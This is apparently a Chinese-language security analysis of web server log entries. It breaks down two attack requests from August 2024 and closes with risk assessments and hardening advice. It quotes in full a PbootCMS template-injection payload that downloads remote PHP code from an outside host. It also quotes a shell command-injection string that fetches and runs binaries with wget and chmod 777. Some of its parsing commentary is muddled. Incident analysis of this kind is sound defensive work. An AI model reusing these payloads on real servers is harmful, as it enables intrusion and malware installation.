请求行

• 方法: GET

• URL: /{pboot:if((\x22file_put_co\x22.\x22ntents\x22)(\x22temp.php\x22,(\x22base6\x22.\x224_decode\x22)(\x22PD9waHAgCmZpbGVfcHV0X2NvbnRlbnRzKCcuL2NvcmUvYmFzaWMvZnVuLnBocCcsZmlsZV9nZXRfY29udGVudHMoJ2h0dHA6Ly9kLnNvZ291YWQudmlwL3R4dD9vdGUudHh0JykpOwplY2hvICd0ZW1wMTExODg4JzsKdW5saW5rKF9fRklMRV9fKTs=\x22)))}{/pboot:if}/../../?p=14
• 这部分URL经过精心构造，尝试绕过安全过滤和检查。它使用了{pboot:if(...)}{/pboot:if}这样的结构，可能是在尝试利用某个CMS（如PbootCMS）的模板注入漏洞。
• \x22是十六进制表示的引号（"），用于绕过某些检测机制。
• file_put_contents和base64_decode函数被用于在服务器上写入文件（temp.php），这个文件的内容是经过Base64编码的PHP代码。
• 解码后的PHP代码大致如下：

• 这段代码尝试从远程URL（http://d.sogouad.vip/txt/ote.txt）下载内容并保存到服务器上的./core/basic/fun.php文件，然后删除自身（unlink(__FILE__);）。

• HTTP版本: HTTP/1.1

状态行

• 状态码: 301
• 这通常表示请求的资源已永久移动到新位置，但在这种情况下，它可能是服务器对非法请求的默认响应，或者是服务器配置导致的重定向。

• 响应大小: 162 字节

• 引用页: http://n666888.com

用户代理

• 用户代理字符串: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
• 这是一个模拟Chrome浏览器的用户代理字符串，用于伪装正常用户的浏览器访问。

1. 尝试删除文件：cd+/tmp;rm+earm+earm5+earm7
• 这部分尝试切换到/tmp目录（但cd命令后应有空格分隔，这里可能是格式错误或尝试绕过检测），然后删除名为earm、earm5、earm7的文件。但由于+通常不被shell用作命令分隔符（而是空格或;），且URL编码可能不正确（\x5C是反斜杠\的十六进制表示，但在URL中应直接写为/），因此这部分可能不会按预期执行。

2. 下载并执行恶意文件：
• nohup+wget+http:/\x5C/154.216.20.232/earm7;chmod+777+earm7;./earm7+jaws
• 这部分尝试使用wget命令从http://154.216.20.232/（注意URL中的\x5C应该是/的误用）下载名为earm7的文件，然后将其权限更改为777（即允许所有用户读写执行），最后尝试执行该文件并传递参数jaws。
• 类似的操作还尝试下载并执行earm5和earm文件。

3. 状态码和响应大小：
• 状态码301表示请求的资源已永久移动到新位置，这通常不是由执行恶意命令导致的，而更可能是服务器配置或Web应用程序的默认响应。
• 响应大小162字节可能表示服务器返回的响应体的大小，而不是实际执行的命令的结果。

4. 引用页和用户代理：
• 引用页为"-"，表示没有提供引用页信息。
• 用户代理为KrebsOnSecurity，这很可能是一个伪造的用户代理字符串，用于伪装身份或绕过某些检测机制。实际上，KrebsOnSecurity是一个知名的网络安全博客，其名称被滥用在这里。

1. 第一次攻击
• 攻击源 IP：134.122.184.11
• 攻击时间：2024 年 8 月 7 日 8 时 21 分 09 秒
• 请求方式及内容：GET /{pboot:if((\x22file_put_co\x22.\x22ntents\x22)(\x22temp.php\x22,(\x22base6\x22.\x224_decode\x22)(\x22PD9waHAgCmZpbGVfcHV0X2NvbnRlbnRzKCcuL2NvcmUvYmFzaWMvZnVuLnBocCcsZmlsZV9nZXRfY29udGVudHMoJ2h0dHA6Ly9kLnNvZ291YWQudmlwL3R4dD9vdGUudHh0JykpOwplY2hvICd0ZW1wMTExODg4JzsKdW5saW5rKF9fRklMRV9fKTs=\x22)))}{/pboot:if}/../../?p=14 HTTP/1.1
• 攻击行为分析：利用 PbootCMS 的可能漏洞，尝试通过构造恶意 URL 进行模板注入，将远程恶意代码下载并保存为服务器上的文件，然后执行恶意操作并删除自身。
• 返回状态码及相关信息：状态码 301，传输数据量 162 字节，来源网址为http://n666888.com，用户代理为Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36。

2. 第二次攻击
• 攻击源 IP：185.224.128.83
• 攻击时间：2024 年 8 月 7 日 8 时 27 分 24 秒
• 请求方式及内容：GET /shell?cd+/tmp;rm+earm+earm5+earm7;nohup+wget+http:/\x5C/154.216.20.232/earm7;chmod+777+earm7;./earm7+jaws;nohup+wget+http:/\x5C/154.216.20.232/earm5;chmod+777+earm5;./earm5+jaws;nohup+wget+http:/\x5C/154.216.20.232/earm;chmod+777+earm;./earm+jaws HTTP/1.1
• 攻击行为分析：尝试通过 URL 执行一系列恶意命令，包括切换目录、删除文件、下载并执行恶意文件等操作。
• 返回状态码及相关信息：状态码 301，传输数据量 162 字节，引用页为"-"，用户代理为KrebsOnSecurity。

1. 漏洞利用风险
• 攻击者针对 PbootCMS 可能存在的模板注入漏洞进行攻击，一旦成功，可在服务器上执行任意代码，对服务器的安全性造成极大威胁。
• 服务器配置或应用程序中的漏洞可能被攻击者利用，以执行恶意命令，如在第二次攻击中，攻击者试图通过 URL 执行一系列危险操作。

2. 恶意代码执行风险
• 下载并执行远程恶意代码可能导致服务器被完全控制，数据被窃取、篡改或破坏。
• 恶意代码可能会进一步传播，感染其他系统，扩大攻击范围。

3. 数据安全风险
• 攻击可能导致服务器上的数据泄露，包括用户信息、敏感数据等。
• 数据的完整性也可能受到破坏，影响业务的正常运行。

1. 及时更新软件
• 确保使用的 PbootCMS 及其他软件始终保持最新版本，以修复已知的安全漏洞。
• 定期检查软件更新，及时安装安全补丁。

2. 加强服务器安全配置
• 限制文件上传和执行权限，防止恶意文件上传和执行。
• 配置防火墙和入侵检测系统，及时发现和阻止恶意攻击。
• 定期备份服务器数据，以便在遭受攻击后能够快速恢复。

3. 监控服务器日志
• 定期查看服务器日志，及时发现异常访问和攻击行为。
• 对日志进行分析，了解攻击来源和方式，以便采取相应的防范措施。

4. 提高安全意识
• 对服务器管理人员和用户进行安全培训，提高安全意识，避免因人为疏忽导致安全漏洞。
• 不随意点击来源不明的链接，不下载和安装未知来源的软件。